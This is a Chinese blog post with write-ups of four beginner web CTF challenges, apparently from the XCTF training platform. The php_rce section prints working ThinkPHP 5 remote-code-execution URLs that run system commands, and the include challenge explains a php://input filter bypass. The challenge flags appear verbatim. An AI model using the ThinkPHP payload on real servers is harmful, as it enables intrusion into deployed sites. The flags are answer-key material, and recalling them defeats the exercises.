Lufer

  • 首页
  • 编程
  • 学习笔记
  • 日常折腾
Lufer
Code the World
  1. 首页
  2. 学习笔记
  3. 正文

攻防世界Web高手进阶题

2021年8月12日 780点热度 1人点赞 1条评论

baby_web64

题目

难度系数: 1.0
题目来源: 暂无
题目描述:想想初始页面是哪个

解答

根据提示,直接访问index.php,发现被重定向回1.php,F12看请求,找到答案。

Training-WWW-Robots

题目

难度系数: 1.0
题目来源: 暂无
题目描述:暂无

解答

访问robots.php,得到网站目录。

User-agent: *
Disallow: /fl0g.php


User-agent: Yandex
Disallow: *

访问fl0g.php,得到答案cyberpeace{67670cc4fa7382a7a38f780508caa43b}。

php_rce

题目

难度系数: 2.0
题目来源: 暂无
题目描述:暂无

解答

根据题目描述,应该是远程代码执行漏洞,实验环境提示是ThinkPHPV5,百度搜索该版本的远程执行漏洞,得到代码如下:
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

通过ls命令查看目录文件,发现没有,开始往上层找,最终再三层之后找到了flag文件:

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20../../../

bin boot dev etc flag home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var var

cat一下flag文件得到答案:

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20../../../flag

flag{thinkphp5_rce} flag{thinkphp5_rce}

Web_php_include

题目

难度系数: 2.0
题目来源: XTCTF
题目描述:暂无

解答

根据题目描述,应该是PHP的文件包含漏洞。
PHP的文件包含漏洞是指对于PHP中4个函数include、include_once、require、require_once,当利用这四个函数来包含文件时,不管文件是什么类型(图片、txt等等),都会直接作为php文件进行解析。
观察题目环境,注意到是include了page页面,所以可以在对page的访问中构造攻击命令。

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

然后PHP的文件包含漏洞攻击有两个常用命令:

  1. php://input
    这个协议的利用方法是 将要执行的语法php代码写在post中提交,不用键与值的形式,只写代码即可。
  2. php://filter
    设计用来过滤筛选文件,通过filter非php语法文件导致include失败,直接输出源码内容。

先采用input方法执行ls指令来查看目录下都有什么文件。
由于代码中对php进行了替换,借助str_replace对大小写敏感来绕过替换。

发现目录下有疑似flag的文件,cat一下内容。

得到答案ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}。

标签: CTF 攻防世界
最后更新:2023年7月10日

Lufer

新的一天开始啦

点赞
< 上一篇
下一篇 >

文章评论

  • 匿名

    学习一下

    2023年9月4日
    回复
  • razz evil exclaim smile redface biggrin eek confused idea lol mad twisted rolleyes wink cool arrow neutral cry mrgreen drooling persevering
    取消回复

    文章目录
    • baby_web64
      • 题目
      • 解答
    • Training-WWW-Robots
      • 题目
      • 解答
    • php_rce
      • 题目
      • 解答
    • Web_php_include
      • 题目
      • 解答

    COPYRIGHT © 2022 lufer.cc.

    Theme Kratos Made By Seaton Jiang

    鲁ICP备2021045819号